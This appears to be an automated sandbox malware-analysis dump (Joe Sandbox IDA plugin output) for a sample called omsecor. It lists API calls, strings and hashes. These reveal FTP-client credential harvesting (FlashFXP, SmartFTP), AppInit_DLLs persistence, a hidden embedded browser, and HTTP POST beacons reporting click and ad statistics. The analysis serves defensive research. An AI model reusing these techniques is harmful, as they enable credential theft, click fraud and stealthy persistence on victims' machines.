                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID: _self$http$+@
                          • API String ID: 1473721057-3317424838
                          • Opcode ID: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
                          • Instruction ID: ae9540e34d1dd6ebd4224328a85202065bb39baa52f6123ff81f2465f468f74f
                          • Opcode Fuzzy Hash: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
                          • Instruction Fuzzy Hash: 6C913D75A00209EFDB00DFA5C988DAEB7B9FF88305B144569E845FB290DB359D41CFA4
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182,?,0040B320,00000000), ref: 00406B8C
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open$CloseQueryValue
                          • String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
                          • API String ID: 3546245721-1332223170
                          • Opcode ID: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                          • Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
                          • Opcode Fuzzy Hash: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                          • Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69
                          APIs
                          • SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
                          • SetParent.USER32(00000000,00000000), ref: 0040A1E2
                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0040A1ED
                          • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0040A1FE
                          • SetWindowPos.USER32(00000000,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E
                            • Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
                            • Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                            • Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
                          • String ID: Shell_TrayWnd$eventConn
                          • API String ID: 2141107913-3455059086
                          • Opcode ID: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                          • Instruction ID: 39c15930e577ecb7297998fc23ff8408fdcdb7101606cb16b0d9d8475b405f16
                          • Opcode Fuzzy Hash: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                          • Instruction Fuzzy Hash: 05216834900214EFDB10AFA4CD89FAB7BB9EF0A311F2046B5F901EA2A1C7755D54CB96
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • HeapAlloc.KERNEL32(00000008,00000626), ref: 00404888
                          • StrStrIA.SHLWAPI(?,?), ref: 00404913
                          • StrStrIA.SHLWAPI(?,?), ref: 00404925
                          • StrStrIA.SHLWAPI(?,?), ref: 00404935
                          • StrStrIA.SHLWAPI(?,?), ref: 00404947
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$AllocCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: ftp://%S:%S@%S:%u$ftplist.txt
                          • API String ID: 1635188419-1322549247
                          • Opcode ID: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                          • Instruction ID: 36c1d9bdffb8f00438c4566312b7f03f9c346fdcff82922ab75e5f9c351e1c12
                          • Opcode Fuzzy Hash: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                          • Instruction Fuzzy Hash: 3581B0B15043819FD721EF29C840A6BBBE5AFC9304F14497EFA84A32D1E738D945CB5A
                          APIs
                          • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
                          • GetLocalTime.KERNEL32(?), ref: 00407387
                          • GetLocalTime.KERNEL32(?), ref: 0040738D
                          • GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
                          • CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
                          • String ID:
                          • API String ID: 3166187867-0
                          • Opcode ID: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
                          • Instruction ID: 26b14636c49f8a61fb06fac8b942a3fa68f3078aba47330515a101c34858e503
                          • Opcode Fuzzy Hash: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
                          • Instruction Fuzzy Hash: 8B316FB2D1022DAACF04EBE5DD459EEB7BDEF44304F10406AF901B3290E7746A04DB69
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID:
                          • String ID: http$+@
                          • API String ID: 0-4127549746
                          • Opcode ID: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
                          • Instruction ID: 8803294073e7eabf7739078d3f203694aecc40311bc63510a67c123621be67c8
                          • Opcode Fuzzy Hash: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
                          • Instruction Fuzzy Hash: 5CA17DB1A00519DFDF00DFA5C984AAEB7B5FF89305B14486AE845FB290DB34AD41CFA4
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004037AD
                          • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 00403804
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: EnvironmentExpandFolderOpenPathStrings
                          • String ID: #$&$*flashfxp*$SOFTWARE\FlashFXP\3$datafolder
                          • API String ID: 1994525040-4055253781
                          • Opcode ID: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                          • Instruction ID: b84aa35a929ccb2802933dbb7828156d7819aaa5c632eb2dc8c8e19af11b7673
                          • Opcode Fuzzy Hash: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                          • Instruction Fuzzy Hash: 203130B2900118AADB10EAA5DC85DDF7BBCEB44718F10847BF605F3180EA399B458B69
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 004099EB
                          • SysAllocString.OLEAUT32(?), ref: 004099F9
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: </domain>$</url>$<domain>$<url>$http://
                          • API String ID: 2525500382-924421446
                          • Opcode ID: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                          • Instruction ID: c36137c4092f7a01c2c9ac5e3109157182881aca1e17db191de13133e2ad13bf
                          • Opcode Fuzzy Hash: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                          • Instruction Fuzzy Hash: D521D876600218A6DB61AB59CC41BDB33E4FB44794F14407FE508B32C2EB785E4D4F99
                          APIs
                          • SysFreeString.OLEAUT32(75C0F6A0), ref: 00408F82
                          • SysFreeString.OLEAUT32(0000000B), ref: 00409046
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID:
                          • API String ID: 3341692771-0
                          • Opcode ID: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
                          • Instruction ID: f0e6d8e47a3946ab2c5de92fa7688d846ddd73d58da4f3d2da06902102303575
                          • Opcode Fuzzy Hash: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
                          • Instruction Fuzzy Hash: A0616C70A0020AEFDB10DFA9DA845AEBBB2FB48304F2048BAD545F7251D7795E52DF08
                          APIs
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • Sleep.KERNEL32(00002710,00000000,00000400,00000000), ref: 0040ACAE
                          • Sleep.KERNEL32(0000EA60), ref: 0040AD76
                          • Sleep.KERNEL32(00002710), ref: 0040ADA4
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$AttemptConnectInternet
                          • String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
                          • API String ID: 362191241-2593661552
                          • Opcode ID: c6d12f3f342631a53f4ba21eed34aabb8925de89328c1543a1445e18d084db7e
                          • Instruction ID: b79182b1151443badf469ae5f9ae195c128285790c89deda34db11c37ea10ffc
                          • Opcode Fuzzy Hash: c6d12f3f342631a53f4ba21eed34aabb8925de89328c1543a1445e18d084db7e
                          • Instruction Fuzzy Hash: 0531C471D00208ABCF20ABA6DC859AE77BAEF80309F10847BE505B72C1DA7849558B5B
                          APIs
                          • _ValidateScopeTableHandlers.LIBCMT ref: 0040D892
                          • __FindPESection.LIBCMT ref: 0040D8AC
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FindHandlersScopeSectionTableValidate
                          • String ID:
                          • API String ID: 876702719-0
                          • Opcode ID: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
                          • Instruction ID: 4070355c3de93ac57746f54d9fb9ba92a54bad1974282013f33c457a7dad05b0
                          • Opcode Fuzzy Hash: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
                          • Instruction Fuzzy Hash: 96A1C172F042158BCB24CF98D981B6E77B1EB84314F56813AD815A73D0DB39AC49CB9D
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004088E4
                          • SysFreeString.OLEAUT32(?), ref: 004088E9
                          • SysFreeString.OLEAUT32(?), ref: 004089D3
                          • SysFreeString.OLEAUT32(?), ref: 004089D8
                          • SysFreeString.OLEAUT32(?), ref: 004089F3
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID: +@
                          • API String ID: 3341692771-3835504741
                          • Opcode ID: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                          • Instruction ID: a3ddab01b40b0bc50fc9c7e4bf61c95a679aea40eaf3a0ce7d8bcb6f132c7745
                          • Opcode Fuzzy Hash: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                          • Instruction Fuzzy Hash: BB518171900219AFDF05BFA1CC45AEF7BB8EF08308F00447AF855B6192EB799A51CB59
                          APIs
                          • Sleep.KERNEL32(00002710,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402566
                          • DeleteFileW.KERNEL32(00000000,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402587
                          • Sleep.KERNEL32(0000EA60,00000000,00000001,00000000,00000000), ref: 004025B3
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • _memset.LIBCMT ref: 004025DA
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00420840,?,?,?,?,?,00000000,00000001,00000000), ref: 0040264D
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$AttemptConnectCreateDeleteFileInternetProcess_memset
                          • String ID: none
                          • API String ID: 2353737338-2140143823
                          • Opcode ID: c6b2da4a895c5a3c06ad821b8c76fb1796c02a28dfb90d6d9730734cddc33c41
                          • Instruction ID: 23ab6f573089ca27c74aa918c09813edc931bf25471b74fd790eff350109b64e
                          • Opcode Fuzzy Hash: c6b2da4a895c5a3c06ad821b8c76fb1796c02a28dfb90d6d9730734cddc33c41
                          • Instruction Fuzzy Hash: 8D319231A00219ABCB21EF61DE49AEF7769FF04748F00043BF905B21C1D6789A51CBAE
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004094E6
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID:
                          • API String ID: 3341692771-0
                          • Opcode ID: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                          • Instruction ID: b8745a711dcf8da59f3798694fa3079dcf63c40c9cdbadd59c4d39193402e254
                          • Opcode Fuzzy Hash: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                          • Instruction Fuzzy Hash: C9214832A00108BBDB01DFAADC44B9E7BB8EF48345F1484B6E805F71A1D774AE41DB84
                          APIs
                          • _memset.LIBCMT ref: 0040A26B
                          • SysAllocString.OLEAUT32(?), ref: 0040A28E
                          • SysAllocString.OLEAUT32(?), ref: 0040A296
                          • SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
                          • SysFreeString.OLEAUT32(?), ref: 0040A2CF
                            • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
                            • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
                            • Part of subcall function 00409FB1: Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                            • Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                            • Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
                          • String ID: J(@
                          • API String ID: 3143865713-2848800318
                          • Opcode ID: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                          • Instruction ID: bfa1c3e5fdaec5be4dfb18607c12502589e7fd5433bac8caf4aacda455aa0499
                          • Opcode Fuzzy Hash: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                          • Instruction Fuzzy Hash: 3A118F72D10219ABCB00DFA9DD448DEBBB9FF08354B11456AF415B7290E770AE14CFA4
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,00000001,?,?,00000000), ref: 00408628
                          • GetLastError.KERNEL32(?,00000000), ref: 0040864A
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          • DeleteFileW.KERNEL32(C:\WINDOWS\system32\gbdwpbm.dll,?,00000000), ref: 00408687
                            • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CloseCreateDeleteErrorFileLastOpenQueryValue
                          • String ID: AppInit_DLLs$C:\WINDOWS\system32\gbdwpbm.dll$Software\Microsoft\Windows NT\CurrentVersion\Windows
                          • API String ID: 4026185228-3265104503
                          • Opcode ID: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                          • Instruction ID: 1689b80d2e7b4165945397198c320d7ed833f5e108bfbebac4dfc06446509e60
                          • Opcode Fuzzy Hash: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                          • Instruction Fuzzy Hash: 99014CB2A44124B6E62067665E06F9B72AC9B00750F220D7BF905F31C0DABA9D1446AD
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 00409B00
                          • SysAllocString.OLEAUT32(?), ref: 00409B0E
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: </title>$</url>$<title>$<url>
                          • API String ID: 2525500382-2286408829
                          • Opcode ID: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                          • Instruction ID: e94fff7a9c4556839c155ffec7726d55edf757161a42396596b5093e86978141
                          • Opcode Fuzzy Hash: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                          • Instruction Fuzzy Hash: 4F01DB7564021CA7DB116A55CC41FD637A8BB44799F044077FA04F32C3E978AA0C4BA4
                          APIs
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • Sleep.KERNEL32(00002710,?,?,?,?,00402C8F,00000032,00000000,00000000,00000000,00000000,?), ref: 0040A91C
                          • Sleep.KERNEL32(00002710), ref: 0040AAC1
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AAE9
                          • HeapFree.KERNEL32(00000000), ref: 0040AAF0
                          Strings
                          • jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
                          • 0, xrefs: 0040AA5B
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: HeapSleep$AttemptConnectFreeInternetProcess
                          • String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
                          • API String ID: 3713053250-1268808612
                          • Opcode ID: b149150f67450d10939e037a4072d5df3dc9b6793fc6db3c061519f1f12da8b2
                          • Instruction ID: cb73c9a78e41fc00613c6eff30345c36a412e41c8c720ed22b53be089701fd16
                          • Opcode Fuzzy Hash: b149150f67450d10939e037a4072d5df3dc9b6793fc6db3c061519f1f12da8b2
                          • Instruction Fuzzy Hash: 88515072A00218A6CF10EB95DC959DF737DEF44308F40447BF406B7281EB789A958FAA
                          APIs
                          • GetLocalTime.KERNEL32(?,?), ref: 004074AD
                          • GetLocalTime.KERNEL32(00000000), ref: 004074B3
                          • GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
                          • String ID:
                          • API String ID: 3777474486-0
                          • Opcode ID: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                          • Instruction ID: c9ff0a62426275c5a0d4f0aa0fa2549fa158b312224671bef63f429b7f92df75
                          • Opcode Fuzzy Hash: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                          • Instruction Fuzzy Hash: 03112C72D1022DAADF00EBD4DC44AEEB7FCBF48314F04445AE901B7240E7B9A608CBA5
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004083DC
                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 004083EF
                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00408417
                          • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040842F
                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00408449
                          • CloseHandle.KERNEL32(?), ref: 00408452
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 1974014688-0
                          • Opcode ID: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                          • Instruction ID: 01d1f8b5f38b633e5055412454defe488cd8fa266e80ff04f0611ceb3180ae32
                          • Opcode Fuzzy Hash: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                          • Instruction Fuzzy Hash: 47115170500201FBEB305F56CE49E5BBBB9EB90700F10892DF596F21E0EB74A951DB28
                          APIs
                          • InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
                          • HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: HttpInternetRequest$ConnectFileOpenReadSend
                          • String ID: POST
                          • API String ID: 961146071-1814004025
                          • Opcode ID: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                          • Instruction ID: 440a75f1c6cd1a7483e62584c22426b42aa3ce760e55699d8a89a0e8c7b72afb
                          • Opcode Fuzzy Hash: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                          • Instruction Fuzzy Hash: B8318E71900119BFDB10DBA4DC84EFE7679EB54349F14087AFA41B62C2D6385E448BA8
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,00000008), ref: 004051EB
                          Strings
                          • SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157
                          • folder, xrefs: 00405184
                          • SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168
                          • personal favorites, xrefs: 00405176
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: EnvironmentExpandOpenStrings
                          • String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
                          • API String ID: 3923277744-821743658
                          • Opcode ID: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
                          • Instruction ID: 0454e2dbaba930a1c05830d090df37f1eb9a44f33d61805f8e12f109ce5a2445
                          • Opcode Fuzzy Hash: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
                          • Instruction Fuzzy Hash: 21213E71D00518ABDB10EB95DC41ADFB7BCEB44318F1084B7E514B2181EB389B49CFA9
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 0040A0C0
                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                          • CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CreateHandleInitializeModuleWindow
                          • String ID: AtlAxWin$Shell.Explorer
                          • API String ID: 950422046-1300462704
                          • Opcode ID: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
